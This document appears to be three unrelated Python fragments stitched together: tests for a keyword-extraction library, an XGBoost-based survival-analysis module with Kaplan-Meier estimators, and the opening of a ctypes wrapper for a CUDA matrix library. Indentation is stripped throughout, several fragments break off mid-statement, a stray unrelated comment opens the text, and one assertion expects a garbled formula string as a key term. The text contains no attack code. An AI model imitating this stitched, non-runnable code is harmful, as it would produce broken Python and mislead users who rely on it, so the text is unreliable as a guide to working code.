# check if a group of circuits has been completed and report on results.
# Then, if there are no more circuits | |
assert S0021999113005652_key_terms[9][0] == "environmental"
assert S0021999113005652_key_terms[9][1] == "impact"
assert S0021999113005652_key_terms[16][0] == "by(24)cb⁎ =∫01〈cb⁎〉(z⁎)dz⁎"
assert S0021999113005652_key_terms[16][1] == "fig"
def test_get_longer_terms(self):
candidate_term1 = ["real", "time"]
candidate_term2 = ["floating", "point"]
longer_terms = [["real", "time", "clock"],
["real", "time", "expert", "system"],
["real", "time", "image", "generation"],
["real", "time", "output"],
["real", "time", "system"],
["floating", "point", "arithmetic"],
["floating", "point", "constant"],
["floating", "point", "operation"],
["floating", "point", "routine"]]
candidate_term1_longer_terms = GCValue._get_longer_terms(candidate_term1, longer_terms)
assert len(candidate_term1_longer_terms) == 5
assert candidate_term1_longer_terms == [['real', 'time', 'clock'],
['real', 'time', 'expert', 'system'],
['real', 'time', 'image', 'generation'],
['real', 'time', 'output'],
['real', 'time', 'system']]
candidate_term2_longer_terms = GCValue._get_longer_terms(candidate_term2, longer_terms)
assert len(candidate_term2_longer_terms) == 4
assert candidate_term2_longer_terms == [["floating", "point", "arithmetic"],
["floating", "point", "constant"],
["floating", "point", "operation"],
["floating", "point", "routine"]]
#gc_value = GCValue()
#gc_value.weighing({"real": 1.0, "time":1.2, "clock":2.1, "expert":3.1, "system":4.1, "image":1.12,
# "generation":1.4, "output":2.1, "floating":0.3, "point": 0.8, "arithmetic": 0.3},
# longer_terms)
@ignore_warnings
def test_keywords_extraction(self):
example_abstract = "Compatibility of systems of linear constraints over the set of natural numbers. " \
"Criteria of compatibility of a system of linear Diophantine equations, strict inequations, " \
"and nonstrict inequations are considered. Upper bounds for components of a minimal set of " \
"solutions and algorithms of construction of minimal generating sets of solutions for all " \
"types of systems are given. These criteria and the corresponding algorithms for " \
"constructing a minimal supporting set of solutions can be used in solving all the " \
"considered types systems and systems of mixed types."
results, top_vertices = keywords_extraction(example_abstract, top_p = 0.3, weight_comb="sum")
print("extracted keywords:"+ str(results))
print("top_vertices: ", top_vertices)
assert 13 == len(results)
term_list = [term[0] for term in results]
assert "linear diophantine equations" == term_list[0]
assert "minimal supporting set" == term_list[1]
assert "minimal set" == term_list[2]
assert "types systems" == term_list[3]
assert "linear constraints" == term_list[4]
assert "strict inequations" == term_list[5]
assert "systems" == term_list[6]
assert "corresponding algorithms" == term_list[7]
assert "nonstrict inequations" == term_list[8]
assert "set" in term_list
assert "minimal" in term_list
assert "algorithms" in term_list
assert "solutions" in term_list
assert "natural numbers" not in term_list
assert 'linear' == top_vertices[0][0]
assert 'systems' == top_vertices[1][0]
assert 'set' == top_vertices[2][0]
assert 'minimal' == top_vertices[3][0]
assert 'equations' == top_vertices[4][0]
assert 'algorithms' == top_vertices[5][0]
assert 'solutions' == top_vertices[6][0]
assert 'inequations' == top_vertices[7][0]
print("after enabling lemmatization....")
results, top_vertices = keywords_extraction(example_abstract, top_p = 0.3, lemma=True, weight_comb="sum")
assert 12 == len(results)
print("extracted keywords after lemmatization: ", results)
print("top_vertices after lemmatization: ", top_vertices)
term_list = [term[0] for term in results]
assert "minimal supporting set" == term_list[0]
assert "linear diophantine equation" == term_list[1]
assert "minimal set" == term_list[2]
assert "type system" == term_list[3]
assert "linear constraint" == term_list[4]
assert "strict inequations" == term_list[5]
assert "system" == term_list[6]
assert "corresponding algorithm" == term_list[7]
assert "nonstrict inequations" == term_list[8]
assert 'system' == top_vertices[0][0]
assert 'set' == top_vertices[1][0]
assert 'linear' == top_vertices[2][0]
assert 'algorithm' == top_vertices[3][0]
assert 'equation' == top_vertices[4][0]
assert 'minimal' == top_vertices[5][0]
assert 'inequations' == top_vertices[6][0]
def test_keywords_extraction2(self):
"""
test keywords extraction with example nodes (with custom syntactic filters and stop-word list) in the paper
"""
example_abstract = "Compatibility of systems of linear constraints over the set of natural numbers. " \
"Criteria of compatibility of a system of linear Diophantine equations, strict inequations, " \
"and nonstrict inequations are considered. Upper bounds for components of a minimal set of " \
"solutions and algorithms of construction of minimal generating sets of solutions for all " \
"types of systems are given. These criteria and the corresponding algorithms for " \
"constructing a minimal supporting set of solutions can be used in solving all the " \
"considered types systems and systems of mixed types."
custom_categories = {'NNS', 'NNP', 'NN', 'JJ', 'VBZ'}
# manually filter few nodes not appearing in the given example of original paper
stop_words={'set', 'mixed', 'corresponding', 'supporting'}
ranked_terms, top_vertices = keywords_extraction(example_abstract, top_p = 1, top_t=None, directed=False,
syntactic_categories=custom_categories, stop_words=stop_words, weight_comb="sum")
print("ranked terms with custom filters 1: ", ranked_terms)
print("top_vertices with custom filters 1: ", top_vertices)
top_vertices_names = [top_vertex[0] for top_vertex in top_vertices]
assert 'supporting' not in top_vertices_names
assert 'corresponding' not in top_vertices_names
assert 'mixed' not in top_vertices_names
assert 'set' not in top_vertices_names
assert 'linear diophantine equations' == ranked_terms[0][0]
assert 'linear constraints' == ranked_terms[1][0]
assert 'types systems' == ranked_terms[2][0]
assert 'upper bounds' == ranked_terms[3][0]
assert 'strict inequations' == ranked_terms[4][0]
assert 'natural numbers' == ranked_terms[5][0]
assert 'systems' == ranked_terms[6][0]
assert 'nonstrict inequations' == ranked_terms[7][0]
assert 'compatibility' == ranked_terms[8][0]
assert 'construction' == ranked_terms[9][0] or 'minimal' == ranked_terms[9][0] \
or 'algorithms' == ranked_terms[9][0] or 'solutions' == ranked_terms[9][0] \
or 'sets' == ranked_terms[9][0]
# >>> [('linear diophantine equations', 0.19805), ('linear constraints', 0.12147),
# ('types systems', 0.10493), ('upper bounds', 0.10114), ('strict inequations', 0.09432),
# ('natural numbers', 0.09091), ('systems', 0.08092), ('nonstrict inequations', 0.07741),
# ('compatibility', 0.04666), ('algorithms', 0.04545), ('minimal', 0.04545),
# ('construction', 0.04545), ('sets', 0.04545), ('solutions', 0.04545),
# ('components', 0.03522), ('criteria', 0.02665), ('types', 0.02401), ('system', 0.02348)]
stop_words={'set', 'mixed', 'corresponding', 'supporting', "minimal"}
ranked_terms, top_vertices = keywords_extraction(example_abstract, top_p = 1, top_t=None, directed=False,
syntactic_categories=custom_categories, stop_words=stop_words)
print("ranked terms with custom filters 2: ", ranked_terms)
print("top_vertices with custom filters 2: ", top_vertices)
top_vertices_names = [top_vertex[0] for top_vertex in top_vertices]
assert 'minimal' not in top_vertices_names
assert 'supporting' not in top_vertices_names
assert 'corresponding' not in top_vertices_names
assert 'mixed' not in top_vertices_names
assert 'set' not in top_vertices_names
# [('linear diophantine equations', 0.20748), ('linear constraints', 0.12726), ('types systems', 0.10992),
# ('upper bounds', 0.10596), ('strict inequations', 0.09881), ('natural numbers', 0.09524),
# ('systems', 0.08477), ('nonstrict inequations', 0.0811), ('solutions', 0.06182), ('algorithms', 0.06182),
# ('compatibility', 0.04889), ('components', 0.0369), ('sets', 0.03342), ('construction', 0.03342),
# ('criteria', 0.02792), ('types', 0.02516), ('system', 0.02459)]
def test_keywords_extraction3(self):
"""
test with different pagerank algorithms
"""
example_abstract = "Compatibility of systems of linear constraints over the set of natural numbers. " \
"Criteria of compatibility of a system of linear Diophantine equations, strict inequations, " \
"and nonstrict inequations are considered. Upper bounds for components of a minimal set of " \
"solutions and algorithms of construction of minimal generating sets of solutions for all " \
"types of systems are given. These criteria and the corresponding algorithms for " \
"constructing a minimal supporting set of solutions can be used in solving all the " \
"considered types systems and systems of mixed types."
results, top_vertices = keywords_extraction(example_abstract, top_p = 0.3, solver="pagerank_numpy", weight_comb="sum")
print("ranked terms computed with 'pagerank_numpy': ", results)
print("top_vertices computed with 'pagerank_numpy': ", top_vertices)
assert len(results) == 13
results, top_vertices = keywords_extraction(example_abstract, top_p = 0.3, solver="pagerank_scipy", weight_comb="sum")
print("ranked terms computed with 'pagerank_scipy': ", results)
print("top_vertices computed with 'pagerank_scipy': ", top_vertices)
assert len(results) == 13
results, top_vertices = keywords_extraction(example_abstract, top_p = 0.3, solver="betweenness_centrality", weight_comb="sum")
print("ranked terms computed with 'betweenness_centrality': ", results)
print("top_vertices computed with 'betweenness_centrality': ", top_vertices)
assert len(results) == 11
results, top_vertices = keywords_extraction(example_abstract, top_p = 0.3, solver="degree_centrality", weight_comb="sum")
print("ranked terms computed with 'degree_centrality': ", results)
print("top_vertices computed with 'degree_centrality': ", top_vertices)
assert top_vertices[0][0] == 'systems'
assert top_vertices[1][0] == 'linear'
assert top_vertices[2][0] == 'minimal' or top_vertices[2][0] == 'set'
# top 30% results is not stable for degree_centrality
# assert len(results) == 11 or len(results) == 12
results, top_vertices = keywords_extraction(example_abstract, top_p = 0.3, solver="hits", weight_comb="sum")
print("ranked terms computed with 'hits': ", results)
print("top_vertices computed with 'hits': ", top_vertices)
assert top_vertices[0][0] == 'systems'
assert top_vertices[1][0] == 'linear'
assert top_vertices[2][0] == 'mixed' or top_vertices[2][0] == 'types'
assert top_vertices[4][0] == 'equations'
assert len(results) == 7 or len(results) == 8
results, top_vertices = keywords_extraction(example_abstract, top_p = 0.3, solver="closeness_centrality", weight_comb="sum")
print("ranked terms computed with 'closeness_centrality': ", results)
print("top_vertices computed with 'closeness_centrality': ", top_vertices)
assert len(results) == 10 or len(results) == 11
results, top_vertices = keywords_extraction(example_abstract, top_p = 0.3, solver="edge_betweenness_centrality", weight_comb="sum")
print("ranked terms computed with 'edge_betweenness_centrality': ", results)
print("top_vertices computed with 'edge_betweenness_centrality': ", top_vertices)
assert len(results) == 8 or len(results) == 10
results, top_vertices = keywords_extraction(example_abstract, top_p = 0.3, solver="eigenvector_centrality", max_iter=1000, weight_comb="sum")
print("ranked terms computed with 'eigenvector_centrality': ", results)
print("top_vertices computed with 'eigenvector_centrality': ", top_vertices)
assert len(results) == 7 or len(results) == 8
results, top_vertices = keywords_extraction(example_abstract, top_p = 0.3, solver="katz_centrality", | |
import warnings
import numpy as np
import pandas as pd
import xgboost as xgb
import scipy.stats as st
from sklearn.neighbors import BallTree
from xgbse._base import XGBSEBaseEstimator
from xgbse.converters import convert_data_to_xgb_format, convert_y
from xgbse.non_parametric import (
calculate_kaplan_vectorized,
get_time_bins,
calculate_interval_failures,
)
# at which percentiles will the KM predict
KM_PERCENTILES = np.linspace(0, 1, 11)
DEFAULT_PARAMS = {
"objective": "survival:aft",
"eval_metric": "aft-nloglik",
"aft_loss_distribution": "normal",
"aft_loss_distribution_scale": 1,
"tree_method": "hist",
"learning_rate": 5e-2,
"max_depth": 8,
"booster": "dart",
"subsample": 0.5,
"min_child_weight": 50,
"colsample_bynode": 0.5,
}
DEFAULT_PARAMS_TREE = {
"objective": "survival:cox",
"eval_metric": "cox-nloglik",
"tree_method": "exact",
"max_depth": 100,
"booster": "dart",
"subsample": 1.0,
"min_child_weight": 30,
"colsample_bynode": 1.0,
}
# class to turn XGB into a kNN with a kaplan meier in the NNs
class XGBSEKaplanNeighbors(XGBSEBaseEstimator):
"""
## XGBSEKaplanNeighbors
Convert xgboost into a nearest-neighbor model, where Hamming distance defines
similar elements as the ones that co-occurred the most at the ensemble's terminal nodes.
Then, for each neighbor set, compute survival estimates with the Kaplan-Meier estimator.
"""
def __init__(self, xgb_params=DEFAULT_PARAMS, n_neighbors=30, radius=None):
"""
Args:
xgb_params (Dict): parameters for XGBoost model, see
https://xgboost.readthedocs.io/en/latest/parameter.html
n_neighbors (Int): number of neighbors for computing KM estimates
radius (Float): If set, uses a radius around the point for neighbors search
"""
self.xgb_params = xgb_params
self.n_neighbors = n_neighbors
self.radius = radius
self.persist_train = False
self.index_id = None
def fit(
self,
X,
y,
num_boost_round=1000,
validation_data=None,
early_stopping_rounds=None,
verbose_eval=0,
persist_train=True,
index_id=None,
time_bins=None,
):
"""
Transform feature space by fitting a XGBoost model and outputting its leaf indices.
Build search index in the new space to allow nearest neighbor queries at scoring time.
Args:
X ([pd.DataFrame, np.array]): design matrix to fit XGBoost model
y (structured array(numpy.bool_, numpy.number)): binary event indicator as first field,
and time of event or time of censoring as second field.
num_boost_round (Int): Number of boosting iterations.
validation_data (Tuple): Validation data in the format of a list of tuples [(X, y)]
if user desires to use early stopping
early_stopping_rounds (Int): Activates early stopping.
Validation metric needs to improve at least once
in every **early_stopping_rounds** round(s) to continue training.
See xgboost.train documentation.
verbose_eval ([Bool, Int]): level of verbosity. See xgboost.train documentation.
persist_train (Bool): whether or not to persist training data to use explainability
through prototypes
index_id (pd.Index): user defined index if intended to use explainability
through prototypes
time_bins (np.array): specified time windows to use when making survival predictions
Returns:
XGBSEKaplanNeighbors: fitted instance of XGBSEKaplanNeighbors
"""
self.E_train, self.T_train = convert_y(y)
if time_bins is None:
time_bins = get_time_bins(self.T_train, self.E_train)
self.time_bins = time_bins
# converting data to xgb format
dtrain = convert_data_to_xgb_format(X, y, self.xgb_params["objective"])
# converting validation data to xgb format
evals = ()
if validation_data:
X_val, y_val = validation_data
dvalid = convert_data_to_xgb_format(
X_val, y_val, self.xgb_params["objective"]
)
evals = [(dvalid, "validation")]
# training XGB
self.bst = xgb.train(
self.xgb_params,
dtrain,
num_boost_round=num_boost_round,
early_stopping_rounds=early_stopping_rounds,
evals=evals,
verbose_eval=verbose_eval,
)
# creating nearest neighbor index
leaves = self.bst.predict(dtrain, pred_leaf=True)
self.tree = BallTree(leaves, metric="hamming", leaf_size=40)
if persist_train:
self.persist_train = True
if index_id is None:
index_id = X.index.copy()
self.index_id = index_id
return self
def predict(
self,
X,
time_bins=None,
return_ci=False,
ci_width=0.683,
return_interval_probs=False,
):
"""
Make queries to nearest neighbor search index build on the transformed XGBoost space.
Compute a Kaplan-Meier estimator for each neighbor-set. Predict the KM estimators.
Args:
X (pd.DataFrame): data frame with samples to generate predictions
time_bins (np.array): specified time windows to use when making survival predictions
return_ci (Bool): whether to return confidence intervals via the Exponential Greenwood formula
ci_width (Float): width of confidence interval
return_interval_probs (Bool): Boolean indicating if interval probabilities are
supposed to be returned. If False the cumulative survival is returned.
Returns:
(pd.DataFrame): A dataframe of survival probabilities
for all times (columns), from a time_bins array, for all samples of X
(rows). If return_interval_probs is True, the interval probabilities are returned
instead of the cumulative survival probabilities.
upper_ci (np.array): upper confidence interval for the survival
probability values
lower_ci (np.array): lower confidence interval for the survival
probability values
"""
# converting to xgb format
d_matrix = xgb.DMatrix(X)
# getting leaves and extracting neighbors
leaves = self.bst.predict(d_matrix, pred_leaf=True)
if self.radius:
assert self.radius > 0, "Radius must be positive"
neighs, _ = self.tree.query_radius(
leaves, r=self.radius, return_distance=True
)
number_of_neighbors = np.array([len(neigh) for neigh in neighs])
if np.argwhere(number_of_neighbors == 1).shape[0] > 0:
# If there is at least one sample without neighbors apart from itself
# a warning is raised suggesting a radius increase
warnings.warn(
"Warning: Some samples don't have neighbors apart from itself. Increase the radius",
RuntimeWarning,
)
else:
_, neighs = self.tree.query(leaves, k=self.n_neighbors)
# gathering times and events/censors for neighbor sets
T_neighs = self.T_train[neighs]
E_neighs = self.E_train[neighs]
# vectorized (very fast!) implementation of Kaplan Meier curves
if time_bins is None:
time_bins = self.time_bins
# calculating z-score from width
z = st.norm.ppf(0.5 + ci_width / 2)
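# e.g. ci_width=0.683 gives z ~= 1.0 (one standard deviation),
# while ci_width=0.95 would give z ~= 1.96.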
preds_df, upper_ci, lower_ci = calculate_kaplan_vectorized(
T_neighs, E_neighs, time_bins, z
)
if return_ci and return_interval_probs:
raise ValueError(
"Confidence intervals for interval probabilities is not supported. Choose between return_ci and return_interval_probs."
)
if return_interval_probs:
preds_df = calculate_interval_failures(preds_df)
return preds_df
if return_ci:
return preds_df, upper_ci, lower_ci
return preds_df
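# A minimal usage sketch (hypothetical variable names; assumes `y_train` is a structured
# array of (event indicator, time) as described in `fit`, and `X_train`/`X_test` are
# feature DataFrames):
#
#   model = XGBSEKaplanNeighbors(n_neighbors=50)
#   model.fit(X_train, y_train, num_boost_round=500)
#   survival_curves = model.predict(X_test)                      # survival per time bin
#   curves, upper_ci, lower_ci = model.predict(X_test, return_ci=True)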
def _align_leaf_target(neighs, target):
# getting times and events for each leaf element
target_neighs = neighs.apply(lambda x: target[x])
# converting to vectorized kaplan format
# filling nas due to different leaf sizes with 0
target_neighs = (
pd.concat([pd.DataFrame(e) for e in target_neighs.values], axis=1)
.T.fillna(0)
.values
)
return target_neighs
# class to turn XGB into a kNN with a kaplan meier in the NNs
class XGBSEKaplanTree(XGBSEBaseEstimator):
"""
## XGBSEKaplanTree
Single tree implementation as a simplification to `XGBSEKaplanNeighbors`.
Instead of doing nearest neighbor searches, fit a single tree via `xgboost`
and calculate KM curves at each of its leaves.
"""
def __init__(
self,
xgb_params=DEFAULT_PARAMS_TREE,
):
"""
Args:
xgb_params (Dict): parameters for fitting the tree, see
https://xgboost.readthedocs.io/en/latest/parameter.html
"""
self.xgb_params = xgb_params
self.persist_train = False
self.index_id = None
def fit(
self,
X,
y,
persist_train=True,
index_id=None,
time_bins=None,
ci_width=0.683,
**xgb_kwargs,
):
"""
Fit a single decision tree using xgboost. For each leaf in the tree,
build a Kaplan-Meier estimator.
Args:
X ([pd.DataFrame, np.array]): design matrix to fit XGBoost model
y (structured array(numpy.bool_, numpy.number)): binary event indicator as first field,
and time of event or time of censoring as second field.
persist_train (Bool): whether or not to persist training data to use explainability
through prototypes
index_id (pd.Index): user defined index if intended to use explainability
through prototypes
time_bins (np.array): specified time windows to use when making survival predictions
ci_width (Float): width of confidence interval
Returns:
XGBSEKaplanTree: Trained instance of XGBSEKaplanTree
"""
E_train, T_train = convert_y(y)
if time_bins is None:
time_bins = get_time_bins(T_train, E_train)
self.time_bins = time_bins
# converting data to xgb format
dtrain = convert_data_to_xgb_format(X, y, self.xgb_params["objective"])
# training XGB
self.bst = xgb.train(self.xgb_params, dtrain, num_boost_round=1, **xgb_kwargs)
# getting leaves
leaves = self.bst.predict(dtrain, pred_leaf=True)
# organizing elements per leaf
leaf_neighs = (
pd.DataFrame({"leaf": leaves})
.groupby("leaf")
.apply(lambda x: list(x.index))
)
# getting T and E for each leaf
T_leaves = _align_leaf_target(leaf_neighs, T_train)
E_leaves = _align_leaf_target(leaf_neighs, E_train)
# calculating z-score from width
z = st.norm.ppf(0.5 + ci_width / 2)
# vectorized (very fast!) implementation of Kaplan Meier curves
(
self._train_survival,
self._train_upper_ci,
self._train_lower_ci,
) = calculate_kaplan_vectorized(T_leaves, E_leaves, time_bins, z)
# adding leaf indexes
self._train_survival = self._train_survival.set_index(leaf_neighs.index)
self._train_upper_ci = self._train_upper_ci.set_index(leaf_neighs.index)
self._train_lower_ci = self._train_lower_ci.set_index(leaf_neighs.index)
if persist_train:
self.persist_train = True
if index_id is None:
index_id = X.index.copy()
self.tree = BallTree(leaves.reshape(-1, 1), metric="hamming", leaf_size=40)
self.index_id = index_id
return self
def predict(self, X, return_ci=False, return_interval_probs=False):
"""
Run samples through tree until terminal nodes. Predict the Kaplan-Meier
estimator associated to the leaf node each sample ended into.
Args:
X (pd.DataFrame): data frame with samples to generate predictions
return_ci (Bool): whether to return confidence intervals via the Exponential Greenwood formula
return_interval_probs (Bool): Boolean indicating if interval probabilities are
supposed to be returned. If False the cumulative survival is returned.
Returns:
preds_df (pd.DataFrame): A dataframe of survival probabilities
for all times (columns), from a time_bins array, for all samples of X
(rows). If return_interval_probs is True, the interval probabilities are returned
instead of the cumulative survival probabilities.
upper_ci (np.array): upper confidence interval for the survival
| |
<filename>cudanet/cudanet.py
# ----------------------------------------------------------------------------
# Copyright 2014 Nervana Systems Inc. All rights reserved.
# ----------------------------------------------------------------------------
import os
import warnings
import ctypes as ct
import ctypes.util
from ctypes import pythonapi
import numpy as np
MAX_ONES = 1024*256
cudanet_lib_path = ct.util.find_library('cconv2_cudanet')
if cudanet_lib_path is None:
raise OSError("Problems locating libcudanet shared library")
_cudanet = ct.cdll.LoadLibrary(cudanet_lib_path)
_cudanet.get_last_cuda_error.restype = ct.c_char_p
_cudanet.cublas_init.restype = ct.c_int
_cudanet.cublas_shutdown.restype = ct.c_int
_cudanet.cuda_set_device.restype = ct.c_int
_cudanet.init_empty.restype = ct.c_int
# _cudanet.reshape.restype = ct.c_int
_cudanet.copy_to_host.restype = ct.c_int
_cudanet.copy_from.restype = ct.c_int
_cudanet.set_host_mat.restype = ct.c_int
_cudanet.allocate_device_memory.restype = ct.c_int
_cudanet.copy_to_device.restype = ct.c_int
_cudanet.copy_on_device.restype = ct.c_int
_cudanet.free_device_memory.restype = ct.c_int
_cudanet.add_elementwise.restype = ct.c_int
_cudanet.add_scalar.restype = ct.c_int
_cudanet.add_vector.restype = ct.c_int
_cudanet.mat_vector_op.restype = ct.c_int
_cudanet.assign_scalar.restype = ct.c_int
_cudanet.subtract_elementwise.restype = ct.c_int
_cudanet.divide_elementwise.restype = ct.c_int
_cudanet.mult_elementwise.restype = ct.c_int
_cudanet.mult_by_scalar.restype = ct.c_int
_cudanet.sign.restype = ct.c_int
_cudanet.apply_sigmoid.restype = ct.c_int
_cudanet.apply_tanh.restype = ct.c_int
_cudanet.apply_soft_threshold.restype = ct.c_int
_cudanet.apply_abs.restype = ct.c_int
_cudanet.apply_log_1_plus_exp.restype = ct.c_int
_cudanet.apply_gamma.restype = ct.c_int
_cudanet.apply_lgamma.restype = ct.c_int
_cudanet.apply_log.restype = ct.c_int
_cudanet.apply_clip_range.restype = ct.c_int
_cudanet.apply_exp.restype = ct.c_int
_cudanet.apply_sqrt.restype = ct.c_int
_cudanet.apply_pow.restype = ct.c_int
_cudanet.apply_pow_matrix.restype = ct.c_int
_cudanet.reciprocal.restype = ct.c_int
_cudanet.convolution.restype = ct.c_int
_cudanet.print_devmat.restype = ct.c_int
_cudanet.get_col_slice_view.restype = ct.c_int
_cudanet.get_col_slice_copy.restype = ct.c_int
_cudanet.set_col_slice.restype = ct.c_int
_cudanet.get_row_slice_view.restype = ct.c_int
_cudanet.get_row_slice_copy.restype = ct.c_int
_cudanet.set_row_slice.restype = ct.c_int
_cudanet.assign_col_slice.restype = ct.c_int
_cudanet.assign_row_slice.restype = ct.c_int
_cudanet.euclid_norm.restype = ct.c_float
_cudanet.manhattan_norm.restype = ct.c_float
_cudanet.vdot.restype = ct.c_float
_cudanet.dot.restype = ct.c_int
_cudanet.less_than.restype = ct.c_int
_cudanet.less_than_scalar.restype = ct.c_int
_cudanet.greater_than.restype = ct.c_int
_cudanet.greater_than_scalar.restype = ct.c_int
_cudanet.equals.restype = ct.c_int
_cudanet.equals_scalar.restype = ct.c_int
_cudanet.minimum.restype = ct.c_int
_cudanet.minimum_scalar.restype = ct.c_int
_cudanet.maximum.restype = ct.c_int
_cudanet.maximum_scalar.restype = ct.c_int
_cudanet.reshape.restype = ct.c_int
_cudanet.add_col_vec.restype = ct.c_int
_cudanet.add_col_mult.restype = ct.c_int
_cudanet.add_row_vec.restype = ct.c_int
_cudanet.mult_by_col_vec.restype = ct.c_int
_cudanet.mult_by_row_vec.restype = ct.c_int
_cudanet.divide_by_col_vec.restype = ct.c_int
_cudanet.divide_by_row_vec.restype = ct.c_int
_cudanet.max_by_axis.restype = ct.c_int
_cudanet.min_by_axis.restype = ct.c_int
_cudanet.sum.restype = ct.c_int
_cudanet.sumsq.restype = ct.c_int
_cudanet.mean.restype = ct.c_int
_cudanet.convolution_back_errors.restype = ct.c_int
_cudanet.convolution_back_weights.restype = ct.c_int
_cudanet.copy_transpose.restype = ct.c_int
_cudanet.max_pool.restype = ct.c_int
_cudanet.max_pool_undo.restype = ct.c_int
_cudanet.avg_pool.restype = ct.c_int
_cudanet.avg_pool_undo.restype = ct.c_int
_cudanet.l2_pool.restype = ct.c_int
_cudanet.l2_pool_undo.restype = ct.c_int
_cudanet.unpool_forward.restype = ct.c_int
_cudanet.unpool_backward.restype = ct.c_int
_cudanet.adadelta_update.restype = ct.c_int
_cudanet.xcov.restype = ct.c_int
_cudanet.mean_norm.restype = ct.c_int
_cudanet.crossmap_response_norm.restype = ct.c_int
_cudanet.crossmap_response_norm_undo.restype = ct.c_int
_cudanet.local_contrast_norm.restype = ct.c_int
_cudanet.local_contrast_norm_undo.restype = ct.c_int
_cudanet.get_gpu_pointer.restype = ct.c_ulong
_cudanet.get_device_id.restype = ct.c_int
_cudanet.set_device_id.restype = None
_cudanet.get_peer_access.restype = ct.c_int
_cudanet.get_data_device_id.restype = ct.c_int
_cudanet.randomize_gaussian.restype = ct.c_int
_cudanet.randomize_uniform.restype = ct.c_int
_cudanet.randomize_binary.restype = ct.c_int
_cudanet.add_noise_gaussian.restype = ct.c_int
_cudanet.add_noise_uniform.restype = ct.c_int
_cudanet.randomize_uniform_thresh.restype = ct.c_int
_cudanet.init_random.restype = None
_cudanet.init_random_no_seed.restype = None
_cudanet.destroy_random.restype = None
_cudanet.sync_stream.restype = None
_cudanet.softmax.restype = ct.c_int
_cudanet.softmax_grad.restype = ct.c_int
_cudanet.crossent_cost.restype = ct.c_int
_cudanet.crossent_cost_grad.restype = ct.c_int
_cudanet.get_gpu_pythonbuf.restype = ct.py_object
_cudanet.multi_ranked_error.restype = ct.c_int
def deprecated(func):
"""This is a decorator which can be used to mark functions
as deprecated. It will result in a warning being emitted
when the function is used."""
def newFunc(*args, **kwargs):
warnings.warn("Call to deprecated function %s." % func.__name__,
category=DeprecationWarning)
return func(*args, **kwargs)
newFunc.__name__ = func.__name__
newFunc.__doc__ = func.__doc__
newFunc.__dict__.update(func.__dict__)
return newFunc
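# Editor's sketch (not part of the original module): typical use of the
# decorator above.  _example_sum is a made-up name; calling it emits a
# DeprecationWarning via warnings.warn (the warnings import is assumed to be
# at the top of this file).
@deprecated
def _example_sum(a, b):
    return a + b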
class CUDANetException(Exception):
pass
def get_last_cuda_error():
return str(_cudanet.get_last_cuda_error())
def sync_stream():
"""
Synchronizes the CUDA stream
"""
_cudanet.sync_stream()
def set_device_id(d):
"""
Sets the current deviceid context
"""
_cudanet.set_device_id(ct.c_int(d))
def get_device_id():
"""
Returns the current deviceid context
"""
return _cudanet.get_device_id()
def get_num_devices():
"""
Returns the number of available CUDA devices
"""
err_code = ct.c_int(0)
numdev = _cudanet.get_num_devices(ct.byref(err_code))
if (err_code):
raise generate_exception(err_code.value)
return numdev
def get_peer_access(src, dest):
"""
Returns whether peer access from device src to device dest is available
"""
return _cudanet.get_peer_access(ct.c_int(src), ct.c_int(dest))
def generate_exception(err_code):
"""
Return a CUDANetException object based on the error code err_code.
"""
if err_code == -1:
return CUDANetException("Incompatible matrix dimensions.")
elif err_code == -2:
return CUDANetException("CUBLAS error.")
elif err_code == -3:
return CUDANetException("CUDA error: " + get_last_cuda_error())
elif err_code == -4:
return CUDANetException("Operation not supported on views.")
elif err_code == -5:
return CUDANetException("Operation not supported on transposed matrices.")
elif err_code == -6:
return CUDANetException("Invalid value")
elif err_code == -7:
return CUDANetException("Incompatible transposedness.")
elif err_code == -8:
return CUDANetException("Matrix is not in device memory.")
elif err_code == -9:
return CUDANetException("Operation not supported.")
elif err_code == -10:
return CUDANetException("Convolutional dimensions incorrect")
elif err_code == -11:
return CUDANetException("Convolution Number of filters must be multiple of 16.")
elif err_code == -12:
return CUDANetException("Invalid axis type")
elif err_code == -13:
return CUDANetException("Randomizer not initialized")
class NVMat(ct.Structure):
pass
class HostMat(ct.Structure):
pass
class _PY_BUFFER(ctypes.Structure):
_fields_ = [
("buf", ctypes.c_void_p),
("obj", ctypes.py_object),
("len", ctypes.c_ssize_t),
("itemsize", ctypes.c_ssize_t),
("readonly", ctypes.c_int),
("ndim", ctypes.c_int),
("format", ctypes.c_char_p),
("shape", ctypes.POINTER(ctypes.c_ssize_t)),
("strides", ctypes.POINTER(ctypes.c_ssize_t)),
("suboffsets", ctypes.POINTER(ctypes.c_ssize_t)),
("smalltable", ctypes.c_ssize_t * 2),
("internal", ctypes.c_void_p)
]
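# Note (added comment): _PY_BUFFER mirrors CPython's Py_buffer struct in its
# Python 2.x layout (including the smalltable field) so that _memoryView()
# below can wrap a raw GPU pointer with PyMemoryView_FromBuffer.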
class cudanetmat(ct.Structure):
_fields_ = [('data_host', ct.POINTER(HostMat)),
('data_device', ct.POINTER(NVMat)),
('on_device', ct.c_int),
('on_host', ct.c_int),
('size', ct.c_int * 2),
('is_trans', ct.c_int),
('owns_data', ct.c_int)]
class rnd_struct(ct.Structure):
_fields_ = [('dev_rnd_mults', ct.POINTER(ct.c_uint)),
('dev_rnd_words', ct.POINTER(ct.c_longlong))]
class TransposedCUDAMatrix(object):
def __init__(self, mat):
self.mat = cudanetmat()
ct.memmove(ct.pointer(self.mat), ct.pointer(mat), ct.sizeof(self.mat))
self.mat.is_trans = 1
self.p_mat = ct.pointer(self.mat)
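# Note (added comment): TransposedCUDAMatrix copies the cudanetmat struct and
# flips is_trans, so it is a flagged view of the same device memory rather than
# a physical transpose; CUDAMatrix exposes it as the .T attribute.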
class CUDAMatrix(object):
"""
A CUDAMatrix object represents a matrix of single precision floating point
numbers on a GPU.
"""
def __init__(self, array, copy_to_device = True, copy_on_host = True):
"""
Initializes a new matrix object in one of two ways. If array is a numpy
ndarray, memory for a matrix with the same dimensions is allocated on
the GPU. If the copy_to_device flag is set to True, the GPU matrix is
initialized with the given ndarray. If the copy_on_host flag is set to
True, a copy of the matrix will be created in host memory even if the
matrix is of the correct type (float32, Fortran-contiguous order).
If array is not an ndarray, it must be a cudanetmat structure (typically
the user will never use this way of calling __init__).
"""
if type(array) in [np.ndarray, np.memmap]:
# Convert array to float32 in FORTRAN order
# array = reformat(array, copy = copy_on_host)
# Initialize as a ndarray-tied matrix.
self.mat = cudanetmat()
self.size = self.mat.size
self.p_mat = ct.pointer(self.mat)
self.numpy_array = array
_cudanet.init_from_array(self.p_mat, array.ctypes.data_as(ct.POINTER(ct.c_float)), ct.c_int(array.shape[0]), ct.c_int(array.shape[1]))
if copy_to_device:
err_code = _cudanet.copy_to_device(self.p_mat)
